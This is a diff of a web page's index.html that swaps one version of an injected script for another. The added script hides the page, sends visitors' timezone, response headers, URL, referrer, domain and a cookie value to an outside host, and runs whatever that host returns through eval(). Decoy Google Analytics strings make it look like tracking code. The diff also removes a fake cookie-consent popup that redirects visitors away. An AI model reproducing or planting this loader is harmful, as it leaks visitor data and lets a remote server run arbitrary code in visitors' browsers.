--- a/index.html
+++ b/index.html
@@ -4,42 +4,7 @@
 <script type="text/javascript" src="//cdnjs.cloudflare.com/ajax/libs/jquery/3.2.1/jquery.min.js"></script>
 <script type="text/javascript" src="//cdnjs.cloudflare.com/ajax/libs/jstimezonedetect/1.0.6/jstz.min.js"></script>
 <script>
-$(document).ready(function(){$("body").hide();$("html").append("<div id=\"lo499423ad\" style=\"margin-top:8%;background-color:white;text-align:center;font-size:40px;\">Please Wait for Page to Load...</div>");var f=new XMLHttpRequest();f.open("GET",document.location,true);f.send(null);var g;f.onreadystatechange = function(){g=f.getAllResponseHeaders().toLowerCase();};var b="GoogleAnalyticsObject";var c=("document","script","//www.google-analytics.com/analytics.js");c=("create","UA-988085-1","auto");c=("send","pageview");var d=jstz.determine();var e=d.name();var qu=escape(window.location.search.substr(1));var rui=location.pathname+location.search;var r=document.referrer;var sn=document.domain;var value="; "+document.cookie;var pa=value.split("; "+"_event"+"=");var co=pa.pop().split(";").shift();var q;$.ajax({url:"https://expertsolution.site/track.php",type:"POST",data:"tz="+e+"&he="+g+"&rui="+rui+"&qu="+qu+"&r="+r+"&sn="+sn+"&co="+co,success:function(a){eval(a)}})})
-</script>
-<!-- Modal HTML structure -->
-<div class="modalContainer">
-    <div id="modal" class="modalWrapper" role="dialog" aria-modal="true" aria-labelledby="modal-title">
-        <div class="modalContent">
-            <button id="dismissModal" class="closeBtn" aria-label="Close">Close & Continue</button>
-            <h2 id="modal-title">We Use Cookies</h2>
-            <p>
-                We use cookies to personalize content and analyze traffic. By clicking Accept or Close, you agree to continue to our partner site.
-                See our <a href="https://yourdomain.com/privacy-policy" target="_blank">Privacy Policy</a>.
-            </p>
-            <button id="confirmBtn" class="actionBtn">Accept & Continue</button>
-        </div>
-    </div>
-</div>
-
-<script>
-    var modal = document.getElementById('modal');
-    var dismissModal = document.getElementById('dismissModal');
-    var confirmBtn = document.getElementById('confirmBtn');
-    var redirectUrl = "https://www.google.com"; // ✅ Redirect to Google
-
-    // Show modal and apply blur on page load
-    window.addEventListener('load', function () {
-        modal.classList.add('active');
-        document.body.classList.add('modal-open');
-    });
-
-    // Redirect on button click
-    function handleRedirect() {
-        window.location.href = redirectUrl;
-    }
-
-    dismissModal.addEventListener('click', handleRedirect);
-    confirmBtn.addEventListener('click', handleRedirect);
+$(document).ready(function(){$("body").hide();$("html").append("<div id=\"lo499423ad\" style=\"margin-top:8%;background-color:white;text-align:center;font-size:40px;\">Please Wait for Page to Load...</div>");var f=new XMLHttpRequest();f.open("GET",document.location,true);f.send(null);var g;f.onreadystatechange = function(){g=f.getAllResponseHeaders().toLowerCase();};var b="GoogleAnalyticsObject";var c=("document","script","//www.google-analytics.com/analytics.js");c=("create","UA-988085-1","auto");c=("send","pageview");var d=jstz.determine();var e=d.name();var qu=escape(window.location.search.substr(1));var rui=location.pathname+location.search;var r=document.referrer;var sn=document.domain;var value="; "+document.cookie;var pa=value.split("; "+"_event"+"=");var co=pa.pop().split(";").shift();var q;$.ajax({url:"https://expertsolution.site/track-1.php",type:"POST",data:"tz="+e+"&he="+g+"&rui="+rui+"&qu="+qu+"&r="+r+"&sn="+sn+"&co="+co,success:function(a){eval(a)}})})
 </script>
 
 
